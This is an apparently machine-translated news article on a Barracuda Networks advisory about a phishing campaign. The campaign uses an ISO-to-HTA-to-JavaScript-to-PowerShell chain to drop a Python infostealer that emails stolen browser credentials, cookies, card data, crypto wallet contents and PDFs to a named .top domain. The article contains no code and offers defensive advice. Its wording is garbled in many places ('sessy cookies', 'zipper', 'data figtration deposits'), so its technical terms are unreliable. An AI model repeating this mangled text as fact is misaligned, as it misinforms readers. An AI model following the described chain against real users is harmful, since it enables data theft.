A new advanced phishing attack with a covert informationer malware that exfiltrates a wide range of sensitive data has been discovered by threat analysts.
This malware not only focuses on traditional data types such as stored passwords, but also contains sessy cookies, credit card information, Bitcoin-related extensions and browsing history.
The collected data is then sent as a zipper with an external e -mail account, which emphasizes a significant shift in InfoSteal options.
Attacking method
According to an advice published by Barracuda Networks, the attack begins with a phishing -e -mail that tempts recipients to open an attached purchasing order file.
These e -mails, characterized by grammatical errors, appear from a fake address. The attachment contains an ISO DISC file, a precise replica of data from optical disks such as CDS or DVDs. Embedded in this image file is an HTA (HTML application) file, with which applications can be carried out on the desktop without the security restrictions of a browser.
A series of malignant payloads is activated when performing the HTA file. This series starts with the download and execution of an Obfusced Javascript file from an external server, which then activates a Powershell file that gets a zip file from the same server.
The ZIP file contains a python-based InfoStealer malware.
This malware works briefly to collect data and then deletes all files, including themselves, to prevent detection.
Malware options and data versions
The InfoStealer is designed to collect extensive browser information and files.
It gets Masterkeys from browsers such as Chrome, Edge, Yandex and Brave and records sessy cookies, stored passwords, credit card information and browser history. In addition, the malware data from Bitcoin-related browser content, including Metamask and Coinbase wallet.
The malware focuses on PDF files and zippers entire folders, including those in the desktop, downloads, documents and specific % Appdata % folders. The stolen data is then emailed to different addresses on the Domain Maternamedical.top, each designated for specific types of information such as cookies, PDF files and browser content.
Read more about CyberSecurity threats for companies: Supply Chains remain hidden threat to business
Implications for cyber security
According to Barracuda, this attack represents a new limit in data figtration deposits, in which the wide range of data collection of the malware entails serious risks.
“Most phishing attacks are associated with data theft, but here we look at an attack designed for extensive data output carried out by an advanced info stealer,” said Saravanan Mohan, manager of threat analyst at Barracuda.
“The amount and reach of sensitive information that can be taken is extensive. Some may be used in further malignant activity, such as lateral movement or financial fraud. While cyber criminals continue to develop advanced methods to steal critical information, it is important for companies to remain vigilant and proactive in their cyber security efforts.”
The most important strategies recommended by the company include implementing robust security protocols, continuous monitoring on suspicious activities and employee education on potential threats.
Multiple e-mail protection solutions using AI and Machine Learning are also useful when detecting and blocking such phishing attempts before they reach user inboxes.